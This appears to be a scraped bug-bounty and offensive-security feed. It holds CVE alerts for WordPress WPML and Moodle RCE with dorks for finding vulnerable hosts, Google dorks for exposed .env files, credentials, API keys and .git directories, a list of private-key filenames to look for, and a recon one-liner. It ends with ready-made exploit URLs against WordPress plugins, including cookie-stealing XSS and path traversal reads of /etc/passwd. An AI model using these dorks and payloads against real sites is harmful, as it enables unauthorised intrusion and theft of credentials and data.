Wake Up! Your Mom and Dad are waiting for your success 🤩 They're both running out of time.
GitHub - AutoRecon/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
CVE-2024-6386: RCE in WPML WordPress Plugin, 9.9 rating 🔥
Due to the lack of input validation, an attacker can execute code on the affected server.
Search at Netlas.io:
Link: https://nt.ls/caxUk
Dork: http.body:"plugins/wpml"
Read more: https://sec.stealthcopter.com/wpml-rce-via-twig-ssti/
Useful Google Dorks that bug bounty hunters can leverage to find sensitive information:
1. Discovering Exposed Files:
- intitle:"index of" site:target.com
- filetype:log inurl:log site:target.com
- filetype:sql inurl:sql site:target.com
- filetype:env inurl:.env site:target.com
2. Finding Sensitive Directories:
- inurl:/phpinfo.php site:target.com
- inurl:/admin site:target.com
- inurl:/backup site:target.com
- inurl:wp- site:target.com
3. Exposed Configuration Files:
- filetype:config inurl:config site:target.com
- filetype:ini inurl:wp-config.php site:target.com
- filetype:json inurl:credentials site:target.com
4. Discovering Usernames and Passwords:
- intext:"password" filetype:log site:target.com
- intext:"username" filetype:log site:target.com
- filetype:sql "password" site:target.com
5. Finding Database Files:
- filetype:sql inurl:db site:target.com
- filetype:sql inurl:dump site:target.com
- filetype:bak inurl:db site:target.com
6. Exposed Git Repositories:
- inurl:".git" site:target.com
- inurl:"/.git/config" site:target.com
- intitle:"index of" ".git" site:target.com
7. Finding Publicly Exposed Emails:
- intext:"email" site:target.com
- inurl:"contact" intext:"@target.com" -www.target.com
- filetype:xls inurl:"email" site:target.com
8. Discovering Vulnerable Web Servers:
- intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
- intitle:"Index of /" "Apache Server" site:target.com
- intitle:"Welcome to nginx" site:target.com
9. Finding API Keys:
- filetype:env "DB_PASSWORD" site:target.com
- intext:"api_key" filetype:env site:target.com
- intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com
10. Exposed Backup Files:
- filetype:bak inurl:backup site:target.com
- filetype:zip inurl:backup site:target.com
- filetype:tgz inurl:backup site:target.com
Replace target.com with the domain or target you are focusing on.
#GoogleDorks
#BugHunting
#OSINT
CVE-2024-43425: RCE in Moodle, PoC is available 🔥🔥🔥
Due to incomplete sanitization in the "calculated questions" feature, attackers can transmit and execute arbitrary code, which can be used to disclose students' confidential information or disrupt the entire learning process.
Search at Netlas.io:
Link: https://nt.ls/6WaFx
Dork: http.headers.set_cookie:"MoodleSession"
Read more: https://blog.redteam-pentesting.de/2024/moodle-rce/
https://github.com/vladko312/SSTImap
Presentation.pdf (3.9 MB)
Deobfuscation and analysis of client-side JavaScript code to detect DOM-based XSS.
minikube.pem
test_key.pem
test_rsa_privkey.pem
test_rsa_privkey_encrypted.pem
rsakey.pem
key.pem
certificate.pem
private_key.pem
public_key.pem
privkey.pem
dhparams.pem
ios_push_certificate.pem
keycert.passwd.pem
ca1-key.pem
key-certbot.pem
key2048.pem
private.pem
⚡️Command for Hidden JS Parameter Discovery.
This command takes your recon game to the next level!⚡️
cat subs.txt | (gau --threads 20 --blacklist jpg,jpeg,gif,png,tiff,ttf,otf,woff,woff2,ico,svg,pdf,txt,mp4,avi,mov,mkv,exe,zip,tar,gz,rar,7z hakrawler --depth 5 --plain --insecure waybackurls || katana -d 5 --js-crawl --auto-redirect --extensions js,json,php,aspx,asp,jsp,html,htm --proxy http://127.0.0.1:8080 ) | sort -u | httpx --silent --threads 200 --status-code --title --tech-detect --content-length --server | tee -a httpx_full.txt | grep -Eiv '\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt|pdf|mp4|avi|mov|mkv|exe|zip|tar|gz|rar|7z|css|doc|docx|xls|xlsx|ppt|pptx)$' | while read url; do vars=$(curl -sL $url | grep -Eo "(var |let |const |function |class |import |export )[a-zA-Z0-9_]+" | sed -e 's, "$url"', -e 's/\(var \|let \|const \|function \|class \|import \|export \)//g' | grep -Eiv '\.js$|\. [a-zA-Z0-9]+\.[a-zA-Z0-9]+$' | sed 's/$/= $FUZZ /'); echo -e "\e[1;33m$url\e[1;32m$vars"; done | tee -a js_parameters.txt
GitHub - lauritzh/domscan: Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects.
Check this if you have these plugins.
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd